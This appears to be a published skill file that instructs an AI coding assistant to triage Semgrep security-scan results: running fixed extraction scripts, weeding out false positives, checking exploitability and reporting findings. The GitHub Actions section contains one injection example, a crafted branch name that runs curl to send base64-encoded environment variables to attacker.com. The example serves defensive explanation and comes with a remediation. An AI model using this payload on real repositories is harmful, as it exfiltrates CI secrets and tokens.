review-semgrep
Review and triage semgrep security scan results to identify true positive vulnerabilities. Use when analyzing semgrep output, triaging security findings, reviewing static analysis results, or when the user has semgrep-results directories to review. Performs deep code analysis to distinguish real vulnerabilities from false positives with high confidence.
$ 安裝
git clone https://github.com/majiayu000/claude-skill-registry /tmp/claude-skill-registry && cp -r /tmp/claude-skill-registry/skills/development/review-semgrep ~/.claude/skills/claude-skill-registry// tip: Run this command in your terminal to install the skill
name: review-semgrep description: Review and triage semgrep security scan results to identify true positive vulnerabilities. Use when analyzing semgrep output, triaging security findings, reviewing static analysis results, or when the user has semgrep-results directories to review. Performs deep code analysis to distinguish real vulnerabilities from false positives with high confidence.
Review Semgrep Security Findings
Expert security analysis workflow for triaging semgrep scan results and identifying true positive vulnerabilities.
Project Structure
All paths are relative to the project root (working directory):
threat_hunting/ # Project root (working directory)
├── <org-name>/ # Cloned repositories (e.g., jitsi/, tronprotocol/)
│ └── <repo-name>/ # Individual repository source code
├── findings/<org-name>/ # All scan results for an organization
│ ├── semgrep-results/ # Semgrep JSON output files
│ │ └── <repo-name>.json
│ ├── trufflehog-results/
│ ├── artifact-results/
│ ├── kics-results/
│ └── reports/ # Final consolidated reports
└── scripts/ # ALL extraction and scanning scripts
Repository source code location: <org-name>/<repo-name>/ (e.g., jitsi/jicofo/src/main/java/...)
Scan results location: findings/<org-name>/semgrep-results/<repo-name>.json
CRITICAL: Do NOT Write Custom Scripts
All extraction scripts already exist in ./scripts/. Never write custom jq, Python, or shell scripts to parse findings. The existing scripts handle:
- Complex JSON/NDJSON parsing
- Large file handling
- Edge cases and error handling
- Consistent output formatting
Available extraction scripts:
./scripts/extract-semgrep-findings.sh- Parse semgrep results./scripts/extract-trufflehog-findings.sh- Parse trufflehog results./scripts/extract-artifact-findings.sh- Parse artifact results./scripts/extract-kics-findings.sh- Parse KICS results
If you need functionality not provided by existing scripts, ask the user to update the scripts rather than writing one-off solutions.
CRITICAL: Always Use the Extraction Script First
MANDATORY: Before doing ANY manual analysis, you MUST run the extraction script to get a summary of findings:
./scripts/extract-semgrep-findings.sh <org-name>
This script:
- Parses all JSON result files efficiently
- Extracts only the findings (not metadata bloat)
- Formats output in a readable, actionable format
- Shows severity, rule ID, file location, and description
DO NOT attempt to read JSON files directly or use Grep to parse them. The extraction script handles the complex JSON structure and large file sizes automatically.
Quick Reference
# Extract from findings/ directory (per-repo files)
./scripts/extract-semgrep-findings.sh <org-name> # All repos, summary
./scripts/extract-semgrep-findings.sh <org-name> summary <repo> # Specific repo
./scripts/extract-semgrep-findings.sh <org-name> count # Counts only
# Extract from catalog scans (merged gzipped files)
./scripts/extract-semgrep-findings.sh <org-name> --catalog # Latest scan
./scripts/extract-semgrep-findings.sh <org-name> --scan 2025-12-24 # Specific scan
# Scan repositories (if not already done)
./scripts/scan-semgrep.sh <org-name>
Data Sources:
findings/<org>/semgrep-results/*.json- Per-repo results (uncompressed)catalog/tracked/<org>/scans/<timestamp>/semgrep.json.gz- Merged scan (gzipped)
Workflow
Step 1: Run the Extraction Script and Verify Counts
ALWAYS START HERE - Run the extraction script with count format first:
# Step 1a: Get counts to verify total findings
./scripts/extract-semgrep-findings.sh <org-name> count
# Step 1b: Then get the full summary
./scripts/extract-semgrep-findings.sh <org-name>
CRITICAL COUNT VERIFICATION: The summary output shows "Total: N findings" at the bottom. This MUST match the sum of all counts from step 1a. If they don't match, the extraction may be truncating results - investigate before proceeding.
Review the script output to understand:
- Total number of findings across all repos
- Which repos have the most findings
- Types of issues detected (by rule ID)
- Severity distribution (ERROR vs WARNING)
Note: Findings are sorted by severity (ERROR first, then WARNING). All ERROR findings appear at the top of the output for immediate attention.
Step 2: Triage Findings
For each finding, quickly assess whether it warrants deep analysis:
Likely FALSE POSITIVE - Skip these:
- Test files (
*_test.go,*.spec.ts,__tests__/) - Example/demo code (
examples/,demo/,sample) - Vendor/third-party code (
vendor/,node_modules/) - Documentation files showing code samples
- Intentional patterns with explanatory comments
Likely TRUE POSITIVE - Analyze these:
- Production code paths
- Code handling user input
- Authentication/authorization logic
- Cryptographic operations
- Database queries
- File system operations
Prioritize by severity:
- ERROR findings in production code
- WARNING findings in security-sensitive areas
- Everything else
Step 3: Deep Analysis
For each finding that passed triage, verify exploitability:
Read the Source Code
- Read the file at the reported location
- Examine 50+ lines of surrounding context
- Check for mitigating controls nearby
Verify Exploitability (CRITICAL)
Semgrep flags patterns, not proven vulnerabilities. Check:
Input Analysis:
- Is the input user-controlled or hardcoded?
- Constrained inputs (enums, dropdowns) → NOT exploitable
- Freeform inputs (text fields, URLs) → Potentially exploitable
Character Restrictions:
- Can dangerous characters reach the sink?
- GitHub usernames:
[a-z0-9-]only → Cannot inject shell metacharacters - UUIDs:
[a-f0-9-]only → Cannot inject code
Sanitization:
- Is input validated before the dangerous function?
- Does the framework auto-escape (parameterized queries, template escaping)?
Access Control:
- Who can trigger this code path?
- Admin-only → Lower risk than public endpoints
Exploitability Verdict
For each finding, determine:
EXPLOITABLE - User input reaches dangerous sink without sanitization
NOT EXPLOITABLE - Input constrained, sanitized, or not user-controlled
NEEDS INVESTIGATION - Unclear data flow, requires more context
Step 4: Report Findings
Only report findings with 90%+ confidence they are true positives.
For each confirmed finding:
## [Severity] Rule Name
**Repository**: repo-name
**File:Line**: path/to/file.py:123
**Confidence**: 95%
**Summary**: One-line description of the vulnerability
**Analysis**: Why this is a true positive - explain the vulnerable data flow
**Exploitability**: EXPLOITABLE
**Attack Path**: Concrete steps an attacker would take
**Evidence**:
[relevant code snippet]
**Remediation**: Specific fix recommendation
Final Summary:
- Total findings reviewed
- True positives identified (with count by severity)
- Most critical issues requiring immediate attention
- Patterns observed across repositories
Output Formats
Extraction script formats:
summary(default) - Readable finding detailscount- Counts per repositoryfull- Raw JSON for detailed analysis
Reference
JSON Structure (For Understanding Output)
Each finding in the extraction script output contains:
check_id: Semgrep rule that triggeredpath: File path where finding was detectedstart.line/end.line: Line numbersextra.message: Vulnerability descriptionextra.severity: ERROR, WARNING, INFOextra.metadata: CWE, OWASP references, confidence
Note: Do NOT manually parse JSON files - always use the extraction script.
Language-Specific Knowledge
When reviewing code in these languages, consult the detailed guides:
- PHP: See php-vulnerabilities.md for parser differentials (
parse_urlbypass), type juggling,strcmpbypass, and deserialization - Python: See python-vulnerabilities.md for path traversal (
os.path.join/pathlibbypass), pickle/ML deserialization RCE, YAML deserialization, class pollution (prototype pollution equivalent), dynamic import LFI (importlib.import_module()), SSTI, eval/exec injection, command injection, SSRF, and SQL injection - NoSQL/MongoDB: See nosql-injection.md for operator injection (
$ne,$gt,$regex),$whereJavaScript injection, and auth bypass patterns across Python, Node.js, Java, Go, and Ruby - XPath Injection: See xpath-injection.md for XPath injection patterns in Python (lxml), Java (javax.xml.xpath), PHP (SimpleXML/DOMXPath), C# (System.Xml.XPath), and Ruby (Nokogiri/REXML) - authentication bypass, data extraction, parameterized query remediation
GitHub Actions Security (CRITICAL)
GitHub Actions findings require special attention. Rule yaml.github-actions.security.run-shell-injection is HIGH SEVERITY:
Expression Injection Pattern
Vulnerable code in action.yml or workflow:
run: |
BRANCH=${{ github.head_ref }} # DANGEROUS - attacker controls branch name
Why it's critical:
${{ }}expressions are substituted BEFORE bash executiongithub.head_ref(PR branch name) is fully controlled by the PR author- Shell metacharacters in branch names are passed directly to bash
- Any fork can create a malicious PR
Branch name restrictions allow:
$()- command substitution${}- variable expansion;|&- command chaining
Exploitation:
# Attacker creates branch:
git checkout -b 'x$(curl attacker.com/?s=$(env|base64))y'
# Opens PR → GitHub Actions executes the command substitution
Impact:
- Full environment variable exfiltration
- Secret theft (if secrets in env at injection time)
- Repository write access via GITHUB_TOKEN
- Supply chain attacks
NOT a false positive if:
- The action/workflow is used by ANY other repository
- The workflow triggers on
pull_request(exploitable via fork) - Even if "internal tool" - other repos using the action are vulnerable
Remediation:
env:
HEAD_REF: ${{ github.head_ref }}
run: |
BRANCH="$HEAD_REF" # Safe - variable not substituted by GitHub
Guidelines
- Be skeptical - false positives waste developer time
- Consider full context, not just the flagged line
- Pattern match ≠ vulnerability; verify exploitability
- Prioritize by real-world risk, not just severity labels
- Document your reasoning for each verdict
Repository
